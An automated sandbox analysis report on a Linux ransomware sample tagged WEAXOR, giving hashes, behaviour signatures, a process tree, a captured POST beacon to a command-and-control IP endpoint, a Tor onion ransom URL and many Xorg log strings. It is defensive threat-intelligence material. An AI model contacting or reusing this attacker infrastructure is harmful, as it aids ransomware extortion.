Linux Analysis Report
Zc9eO57fgF.elf

Overview

General Information

Sample name: Zc9eO57fgF.elf
renamed because original name is a hash value
Original sample name: 20e0e61d27762a524f6974fb9f4995062582db351d5576e62a214d6b5e5808e7.elf
Analysis ID: 1548498
MD5: 503c35c37d00d04ff2793c2b4bf5038f
SHA1: a03a9d06ca8441cb2ec7fe0c49cb56023130d884
SHA256: 20e0e61d27762a524f6974fb9f4995062582db351d5576e62a214d6b5e5808e7
Tags: elf, Ransomware, WEAXOR, user-JAMESWT_MHT

Detection

Score: 52
Range: 0 - 100
Whitelisted: false

Signatures

Found Tor onion address
Reads system files that contain records of logged in users
Sample reads /proc/mounts (often used for finding a writable filesystem)
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Deletes log files
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
May check the online IP address of the machine
PID-file does not contain an ASCII number
Reads CPU information from /proc indicative of miner or evasive malware
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version: 41.0.0 Charoite
Start date and time: 2024-11-04 15:17:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal52.troj.evad.linELF@0/60@1/0
  • Connection to analysis system has been lost, crash info: Unknown
  • VT rate limit hit for: Zc9eO57fgF.elf
  • system is lnxubuntu20
  • Zc9eO57fgF.elf (PID: 6236, Parent: 6157, MD5: 503c35c37d00d04ff2793c2b4bf5038f) Arguments: /tmp/Zc9eO57fgF.elf
  • systemd New Fork (PID: 6255, Parent: 1)
  • systemd-logind (PID: 6255, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6321, Parent: 1)
  • accounts-daemon (PID: 6321, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6331, Parent: 6321, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6333, Parent: 6331, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6337, Parent: 6333, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6338, Parent: 6337)
          • locale (PID: 6338, Parent: 6337, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6339, Parent: 6337)
          • grep (PID: 6339, Parent: 6337, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 6324, Parent: 1860)
  • pulseaudio (PID: 6324, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • Default (PID: 6328, Parent: 1809, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PostSession/Default
  • gdm3 New Fork (PID: 6342, Parent: 1320)
  • gdm-session-worker (PID: 6342, Parent: 1320, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm-x-session (PID: 6372, Parent: 6342, MD5: 498a824333f1c1ec7767f4612d1887cc) Arguments: /usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
      • Xorg (PID: 6374, Parent: 6372, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg.wrap (PID: 6374, Parent: 6372, MD5: 48993830888200ecf19dd7def0884dfd) Arguments: /usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg (PID: 6374, Parent: 6372, MD5: 730cf4c45a7ee8bea88abf165463b7f8) Arguments: /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
        • Xorg New Fork (PID: 6405, Parent: 6374)
        • sh (PID: 6405, Parent: 6374, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
          • sh New Fork (PID: 6406, Parent: 6405)
          • xkbcomp (PID: 6406, Parent: 6405, MD5: c5f953aec4c00d2a1cc27acb75d62c9b) Arguments: /usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
      • dbus-daemon (PID: 6410, Parent: 6372, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 4 --session
        • dbus-daemon New Fork (PID: 6412, Parent: 6410)
          • false (PID: 6413, Parent: 6412, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
  • gdm3 New Fork (PID: 6344, Parent: 1320)
  • Default (PID: 6344, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6347, Parent: 1320)
  • Default (PID: 6347, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6365, Parent: 1320)
  • Default (PID: 6365, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6416, Parent: 1320)
  • Default (PID: 6416, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6417, Parent: 1320)
  • Default (PID: 6417, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup
No yara matches
No Suricata rule has matched

Source: /tmp/Zc9eO57fgF.elf (PID: 6236) Reads CPU info from proc file: /proc/cpuinfo
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/bin/pulseaudio (PID: 6324) Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/lib/xorg/Xorg (PID: 6374) Reads CPU info from /sys: /sys/devices/system/cpu/online

Networking

Source: Zc9eO57fgF.elf String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/{id}
Source: RECOVERY INFO.txt4.12.dr String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/C2ABC4575244ECF68D260F0145A83B9DB0131B91B97CC32193187E55668333C4
Source: unknown DNS query: name: api.ipify.org
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) Reads hosts file: /etc/hosts
Source: /usr/lib/xorg/Xorg (PID: 6374) Socket: unknown address family
Source: /usr/bin/dbus-daemon (PID: 6410) Socket: unknown address family
Source: unknown TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: unknown HTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1 Host: 193.143.1.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0 Content-Length: 1977 Accept: */* Content-Type: multipart/form-data; boundary=------------------------3yO5v8qEW
Source: Zc9eO57fgF.elf String found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.php
Source: Zc9eO57fgF.elf String found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.phpYour
Source: Zc9eO57fgF.elf String found in binary or memory: http://193.143.1.139/Ujdu8jjoouehttp://api.ipify
Source: Zc9eO57fgF.elf, RECOVERY INFO.txt4.12.dr, RECOVERY INFO.txt13.12.dr, RECOVERY INFO.txt7.12.dr, RECOVERY INFO.txt2.12.dr, RECOVERY INFO.txt8.12.dr, RECOVERY INFO.txt.12.dr, RECOVERY INFO.txt10.12.dr, RECOVERY INFO.txt11.12.dr, RECOVERY INFO.txt0.12.dr, RECOVERY INFO.txt5.12.dr, RECOVERY INFO.txt1.12.dr, RECOVERY INFO.txt3.12.dr, RECOVERY INFO.txt9.12.dr, RECOVERY INFO.txt6.12.dr, RECOVERY INFO.txt12.12.dr String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO
Source: Xorg.0.log.47.dr String found in binary or memory: http://wiki.x.org
Source: Xorg.0.log.47.dr String found in binary or memory: http://www.ubuntu.com/support)
Source: Zc9eO57fgF.elf String found in binary or memory: https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEE
Source: Zc9eO57fgF.elf String found in binary or memory: https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEENSt7__cxx1119basic_is
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: ELF static info symbol of initial sample .symtab present: no
Source: classification engine Classification label: mal52.troj.evad.linELF@0/60@1/0
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) /run/gdm3.pid: ...-{
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) /run/mono-xsp4.pid: .n".
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) /run/sshd.pid: ....
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) /run/crond.pid: .p..
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) /run/acpid.pid: .57.

Persistence and Installation Behavior

Source: /tmp/Zc9eO57fgF.elf (PID: 6236) File: /proc/6236/mounts
Source: /usr/bin/dbus-daemon (PID: 6410) File: /proc/6410/mounts
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) File: /tmp/.89A72EF01
Source: /lib/systemd/systemd-logind (PID: 6255) Directory: <invalid fd (24)>/..
Source: /lib/systemd/systemd-logind (PID: 6255) Directory: <invalid fd (23)>/..
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/seats/.#seat04agMac
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/inhibit/.#336tpsa
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/inhibit/.#5fKbbzb
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/inhibit/.#6PPli7c
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/inhibit/.#1yYk6la
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/inhibit/.#7Kdz37c
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/inhibit/.#4EmLAPa
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/inhibit/.#104Nhbtc
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/inhibit/.#8tNOlXc
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/inhibit/.#1etcjRb
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/users/.#127LWpP9a
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/users/.#12768ksT9
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/seats/.#seat0EmuCMc
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/users/.#127HzAnO8
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/users/.#127jPkZqb
Source: /lib/systemd/systemd-logind (PID: 6255) File: /run/systemd/users/.#127RdFnQb
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6321) Directory: /var/lib/gdm3/.pam_environment
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6321) Directory: /root/.cache
Source: /usr/lib/gdm3/gdm-x-session (PID: 6372) Directory: /var/lib/gdm3/.cache
Source: /usr/lib/xorg/Xorg (PID: 6374) Directory: <invalid fd (23)>/..
Source: /usr/lib/xorg/Xorg (PID: 6374) Directory: <invalid fd (22)>/..
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) Empty hidden file: /tmp/.89A72EF01
Source: /usr/share/language-tools/language-options (PID: 6337) Shell command executed: sh -c "locale -a | grep -F .utf8 "
Source: /usr/lib/xorg/Xorg (PID: 6405) Shell command executed: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
Source: /bin/sh (PID: 6339) Grep executable: /usr/bin/grep -> grep -F .utf8
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) Reads from proc file: /proc/cpuinfo
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) Reads from proc file: /proc/meminfo
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6321) File: /var/lib/AccountsService/icons (bits: - usr: rx grp: rwx all: rwx)
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6321) File: /var/lib/AccountsService/users (bits: - usr: - grp: - all: rwx)
Source: /usr/lib/xorg/Xorg (PID: 6374) Log file created: /var/log/Xorg.0.log
Source: /usr/lib/xorg/Xorg (PID: 6374) Truncated file: /var/log/Xorg.pid-6374.log
Source: /tmp/Zc9eO57fgF.elf (PID: 6236) Queries kernel information via 'uname'
Source: /usr/bin/pulseaudio (PID: 6324) Queries kernel information via 'uname'
Source: /usr/lib/gdm3/gdm-session-worker (PID: 6342) Queries kernel information via 'uname'
Source: /usr/lib/gdm3/gdm-x-session (PID: 6372) Queries kernel information via 'uname'
Source: /usr/lib/xorg/Xorg (PID: 6374) Queries kernel information via 'uname'
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.379] (II) vmware(0): Not using default mode "1792x1344" (insufficient memory for mode)
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.912] (II) vmware(0): Modeline "640x480"x59.9 25.18 640 656 752 800 480 490 492 525 -hsync -vsync (31.5 kHz d)
Source: Xorg.0.log.47.dr Binary or memory string: [ 442.661] (II) event2 - VirtualPS/2 VMware VMMouse: device is a pointer
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.363] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.728] (II) vmware(0): Not using default mode "700x450" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.dr Binary or memory string: [ 434.861] (WW) vmware(0): Disabling RandR12+ support.
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.609] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.336] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.788] (II) vmware(0): Modeline "1152x864"x85.0 119.65 1152 1224 1352 1552 864 865 868 907 -hsync +vsync (77.1 kHz d)
Source: Xorg.0.log.47.dr Binary or memory string: [ 442.717] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration factor: 2.000
Source: Xorg.0.log.47.dr Binary or memory string: [ 435.064] (--) vmware(0): caps: 0xFDFF83E2
Source: Xorg.0.log.47.dr Binary or memory string: [ 442.752] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/mouse0)
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.352] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.469] (II) vmware(0): Not using default mode "1600x1024" (insufficient memory for mode)
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.604] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.597] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.485] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.552] (II) vmware(0): Not using default mode "432x243" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.dr Binary or memory string: [ 442.551] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration threshold: 4
Source: Xorg.0.log.47.dr Binary or memory string: [ 436.947] (II) vmware(0): Modeline "640x350"x85.1 31.50 640 672 736 832 350 382 385 445 +hsync -vsync (37.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.873] (**) vmware(0): Default mode "800x600": 40.0 MHz, 37.9 kHz, 60.3 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.903] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.9 kHz, 72.8 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.368] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.186] (==) vmware(0): Using gamma correction (1.0, 1.0, 1.0)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.630] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.723] (II) vmware(0): Not using default mode "700x450" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.618] (II) Using input driver 'libinput' for 'VirtualPS/2 VMware VMMouse'
Source: Xorg.0.log.47.drBinary or memory string: [ 436.819] (II) vmware(0): Modeline "1024x768"x85.0 94.50 1024 1072 1168 1376 768 769 772 808 +hsync +vsync (68.7 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.091] (--) vmware(0): mwidt: 1176
Source: Xorg.0.log.47.drBinary or memory string: [ 436.805] (**) vmware(0): Default mode "1152x864": 96.8 MHz, 63.0 kHz, 70.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.541] (II) vmware(0): Not using default mode "360x202" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.739] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.865] (II) vmware(0): Modeline "800x600"x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync (46.9 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.862] (**) vmware(0): Default mode "800x600": 49.5 MHz, 46.9 kHz, 75.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.444] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.104] (--) vmware(0): bpp: 32
Source: Xorg.0.log.47.drBinary or memory string: [ 436.944] (**) vmware(0): Default mode "640x350": 31.5 MHz, 37.9 kHz, 85.1 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.915] (**) vmware(0): Default mode "720x405": 22.5 MHz, 25.1 kHz, 59.5 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.480] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.652] (II) vmware(0): Not using default mode "3200x1800" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.568] (II) vmware(0): Not using default mode "512x288" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.837] (**) vmware(0): Default mode "1024x576": 46.5 MHz, 35.9 kHz, 59.9 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.557] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.859] (II) vmware(0): Modeline "800x600"x85.1 56.30 800 832 896 1048 600 601 604 631 +hsync +vsync (53.7 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.466] (II) event3 - VirtualPS/2 VMware VMMouse: device is a pointer
Source: Xorg.0.log.47.drBinary or memory string: [ 436.742] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.591] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.459] (II) event3 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
Source: Xorg.0.log.47.drBinary or memory string: [ 436.328] (II) vmware(0): Not using default mode "1280x960" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.523] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.439] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.702] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.099] (--) vmware(0): depth: 24
Source: Xorg.0.log.47.drBinary or memory string: [ 436.365] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.472] (II) vmware(0): Not using default mode "800x512" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.625] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.935] (II) vmware(0): Modeline "640x360"x59.8 18.00 640 664 720 800 360 363 368 376 -hsync +vsync (22.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.492] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.694] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.078] (--) vmware(0): bpp: 32
Source: Xorg.0.log.47.drBinary or memory string: [ 436.441] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.578] (II) event3 - VirtualPS/2 VMware VMMouse: device is a pointer
Source: Xorg.0.log.47.drBinary or memory string: [ 436.559] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.280] (II) vmware(0): Not using default mode "1024x768i" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.256] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.139] (==) vmware(0): Default visual is TrueColor
Source: Xorg.0.log.47.drBinary or memory string: [ 436.405] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.543] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration factor: 2.000
Source: Xorg.0.log.47.drBinary or memory string: [ 436.394] (II) vmware(0): Not using default mode "1856x1392" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.565] (II) vmware(0): Not using default mode "512x288" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 437.157] (==) vmware(0): Silken mouse enabled
Source: Xorg.0.log.47.drBinary or memory string: [ 442.529] (**) VirtualPS/2 VMware VMMouse: (accel) selected scheme none/0
Source: Xorg.0.log.47.drBinary or memory string: [ 436.410] (II) vmware(0): Not using default mode "416x312" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.747] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.710] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.731] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.620] (II) vmware(0): Not using default mode "1024x576" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.326] (II) vmware(0): Not using default mode "640x480" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 432.352] (==) Matched vmware as autoconfigured driver 0
Source: Xorg.0.log.47.drBinary or memory string: [ 436.633] (II) vmware(0): Not using default mode "2880x1620" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.357] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.402] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.615] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
Source: Xorg.0.log.47.drBinary or memory string: [ 436.897] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.5 kHz, 75.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 442.395] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
Source: Xorg.0.log.47.drBinary or memory string: [ 442.399] (II) Using input driver 'libinput' for 'VirtualPS/2 VMware VMMouse'
Source: Xorg.0.log.47.drBinary or memory string: [ 444.610] (II) vmware(0): Terminating Xv video-stream id:0
Source: Xorg.0.log.47.drBinary or memory string: [ 436.503] (II) vmware(0): Not using default mode "960x540" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.413] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.475] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.769] (**) vmware(0): *Driver mode "vmwlegacy-default-800x600": 36.3 MHz, 36.2 kHz, 60.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.854] (II) vmware(0): Modeline "960x540"x59.6 40.75 960 992 1088 1216 540 543 548 562 -hsync +vsync (33.5 kHz d)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.201] (II) vmware(0): Not using default mode "320x175" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.391] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/event3)
Source: Xorg.0.log.47.drBinary or memory string: [ 442.472] (II) event3 - VirtualPS/2 VMware VMMouse: device removed
Source: Xorg.0.log.47.drBinary or memory string: [ 435.289] (II) vmware(0): Not using default mode "512x384i" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.821] (**) vmware(0): Default mode "1024x768": 78.8 MHz, 60.0 kHz, 75.0 Hz
Source: Xorg.0.log.47.drBinary or memory string: [ 436.399] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 435.237] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.381] (II) vmware(0): Not using default mode "896x672" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 444.561] (II) event2 - VirtualPS/2 VMware VMMouse: device removed
Source: Xorg.0.log.47.drBinary or memory string: [ 435.225] (II) vmware(0): Not using default mode "320x240" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.744] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.508] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.725] (II) vmware(0): Not using default mode "1400x900" (insufficient memory for mode)
Source: Xorg.0.log.47.drBinary or memory string: [ 436.451] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
